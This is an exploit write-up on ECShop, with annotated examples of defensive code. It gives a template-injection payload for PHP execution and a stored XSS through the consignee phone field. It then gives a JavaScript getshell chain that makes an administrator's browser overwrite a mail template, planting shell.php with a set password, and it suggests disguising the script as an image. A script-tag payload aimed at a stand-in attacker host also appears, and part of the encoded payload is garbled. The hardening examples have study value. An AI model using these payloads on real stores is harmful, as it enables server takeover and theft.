0x0 Backend getshell
Where the order is submitted, the code calls get_mail_template() to fetch the content of the remind_of_new_order mail template and then hands it to fetch() for execution. If we can control the content of the remind_of_new_order template, we can make ECShop execute our own PHP.
In the admin backend, open the mail templates under template management and change the remind_of_new_order content to:
{$phpinfo()'];phpinfo();/*}
The template engine rewrites this into the following PHP (the single quote and bracket in the "variable name" close the array subscript, and /* comments out the rest):
<?php echo $this->_var['phpinfo()'];phpinfo();/*']; ?>
The injected code executes successfully.
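To make the breakout concrete, here is an added example (not ECShop's own template engine, which is PHP) that models the single rewrite the writeup relies on, `{$name}` to `<?php echo $this->_var['name']; ?>`, in JavaScript, and contrasts it with a version that only accepts bare identifiers as variable names. The function names, regexes and the `onlyExpectedEcho` check are assumptions for illustration; the payload string is the one from the writeup.

```javascript
// Added example, not ECShop code: a minimal model of a Smarty-like
// {$var} -> PHP rewrite, showing why an unvalidated "variable name"
// becomes arbitrary PHP, and a hardened variant.

// Vulnerable model: everything between "{$" and "}" is pasted verbatim
// into the PHP array subscript, so a name containing "']" closes the
// subscript and the rest is emitted as PHP statements.
function compileNaive(tpl) {
  return tpl.replace(/\{\$([^}]+)\}/g, (_m, name) =>
    "<?php echo $this->_var['" + name + "']; ?>");
}

// Hardened model: only a bare identifier is accepted as a variable name.
// Anything else is left as literal template text instead of becoming PHP
// (a real implementation would also log the attempt).
const IDENT = /^[A-Za-z_][A-Za-z0-9_]*$/;
function compileStrict(tpl) {
  return tpl.replace(/\{\$([^}]+)\}/g, (m, name) =>
    IDENT.test(name) ? "<?php echo $this->_var['" + name + "']; ?>" : m);
}

// Sanity check on compiled output: every PHP block must be exactly the
// expected "echo one variable" form. Anything else means injected code.
function onlyExpectedEcho(compiled) {
  const blocks = compiled.match(/<\?php[\s\S]*?\?>/g) || [];
  return blocks.every(b =>
    /^<\?php echo \$this->_var\['[A-Za-z_][A-Za-z0-9_]*'\]; \?>$/.test(b));
}

// The payload from the writeup (constructed input for this example).
const PAYLOAD = "{$phpinfo()'];phpinfo();/*}";

// Stand-alone demonstration.
console.log(compileNaive(PAYLOAD));                     // PHP with an injected phpinfo() call
console.log(onlyExpectedEcho(compileNaive(PAYLOAD)));   // false
console.log(compileStrict(PAYLOAD));                    // payload left as inert text
console.log(onlyExpectedEcho(compileStrict("{$user_name}"))); // true
```

The point of the hardened variant is not the particular regex but where the check sits: the name is validated before it is interpolated into code, so a template editor with admin rights is no longer a PHP code editor.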
0x1 Frontend XSS
The frontend does not filter sufficiently in several places, so a user can plant malicious JavaScript and mount an XSS attack against the backend administrator.
After registering a user, buy anything at all. In the consignee information, the phone field is only checked on the client side; there is no backend filtering, so a stored XSS there is easy to find (the value is shown to the administrator when the order is viewed).
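An added example (not ECShop's code) of the two fixes a practitioner would want for that field: the same format rule enforced on the server, where a direct POST cannot skip it, and HTML escaping when the stored value is rendered into the admin order page. The function names, the phone regex and the sample payload are assumptions for illustration.

```javascript
// Added example, not ECShop code: server-side validation plus output
// encoding for a consignee phone field that was only checked in the browser.

// Constructed attacker value: a script tag pointing at an attacker-controlled
// host, the same shape of payload the writeup loads from an external JS file.
const XSS_PHONE = '<script src="http://attacker.example/getshell.js"></script>';

// The browser-side check. An attacker simply submits the POST without the
// page (curl, a proxy), so this alone protects nothing.
function clientSideLooksLikePhone(v) {
  return /^[0-9+\-() ]{6,20}$/.test(v);
}

// Same rule, enforced on the server at save time.
function serverValidatePhone(v) {
  return typeof v === 'string' && /^[0-9+\-() ]{6,20}$/.test(v);
}

// Contextual encoding for HTML text and double-quoted attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Vulnerable admin view: the stored phone is pasted into the page verbatim.
function renderConsigneeRowVulnerable(order) {
  return '<td>' + order.tel + '</td>';
}

// Hardened save: reject anything that is not a phone number.
function saveOrderHardened(order) {
  if (!serverValidatePhone(order.tel)) throw new Error('invalid consignee phone');
  return { ...order };
}

// Hardened view: escape on output regardless of how the value got stored
// (defence in depth, e.g. for rows written before validation existed).
function renderConsigneeRowHardened(order) {
  return '<td>' + escapeHtml(order.tel) + '</td>';
}

// Stand-alone demonstration.
console.log(clientSideLooksLikePhone(XSS_PHONE));            // false, but bypassable
console.log(renderConsigneeRowVulnerable({ tel: XSS_PHONE })); // script tag reaches the admin
console.log(renderConsigneeRowHardened({ tel: XSS_PHONE }));   // inert text
```

Both measures are needed: validation stops new bad rows, escaping neutralises whatever is already in the database or arrives through another code path.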
0x2 XSS + backend getshell
Combine the two above.
Because the backend has no CSRF protection, the frontend XSS can drive the administrator's browser into the backend and have the administrator getshell for us. (Note that the injected script runs on the same origin as the admin panel, so a CSRF token on its own would not be a complete fix: the script could fetch the token first. The XSS itself has to be removed.)
The following is the JS implementation of the getshell:
// Form body for admin/mail_template.php?act=save_template. The subject is the
// GBK string 密码找回 ("password retrieval"), tpl=1 selects that template, and
// content carries the template-injection payload (c2hlbGwucGhw is base64 of
// "shell.php"). Two tokens in the payload survive in the source only as the
// word "signature" and are left as they appear.
var shelldata = 'subject=%C3%DC%C2%EB%D5%D2%BB%D8&mail_type=0&tpl=1&content=%7B%24user_name%27%5D%signature%28base64_decode%28%27c2hlbGwucGhw%27%2Cbase64_decode%29%signature%3D%28%27%29%3Becho+%24var%5B%29%24user_name%7D%0D%0A%3C%2Fp%3E%0D%0A%3Cp%3E%7B%24user_name%7D%C4%FA%BA%C3%A3%A1%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%C4%FA%D2%D1%BE%AD%BD%F8%D0%D0%C1%CB%C3%DC%C2%EB%D6%D8%D6%C3%B5%C4%B2%D9%D7%F7%A3%AC%C7%EB%B5%E3%BB%F7%D2%D4%CF%C2%C1%B4%BD%D3%28%BB%F2%D5%DF%B8%B4%D6%C6%B5%BD%C4%FA%B5%C4%E4%AF%C0%C0%C6%F7%29%3A%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%3Ca+target%3D%22_blank%22+href%3D%22%7B%24reset_email%7D%22%3E%7B%24reset_email%7D%3C%2Fa%3E%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%D2%D4%C8%B7%C8%CF%C4%FA%B5%C4%D0%C2%C3%DC%C2%EB%D6%D8%D6%C3%B2%D9%D7%F7%A3%A1%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%7B%24shop_name%7D%3Cbr+%2F%3E%0D%0A%7B%24send_date%7D%3C%2Fp%3E';
try {
    // Synchronous POST from the administrator's browser; the session cookie is
    // attached automatically, which is all the unprotected endpoint checks.
    var xml = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject('Microsoft.XMLHTTP');
    xml.open('POST', '/ecshop/upload/admin/mail_template.php?act=save_template', false);
    xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xml.onreadystatechange = function () { if (xml.readyState == 4) {} };
    xml.send(shelldata);
} catch (e) {}
You can upload this JS disguised as an image and reference it from there, or reference it directly from an external site. For convenience in testing, it is referenced from the local host here.
Finally, submit the order. As soon as the administrator views the order, the script runs in the administrator's browser and saves the modified template.
Then trigger the password-retrieval function on the frontend, which renders the template the script overwrote. shell.php is generated in the web root, and its password is 207.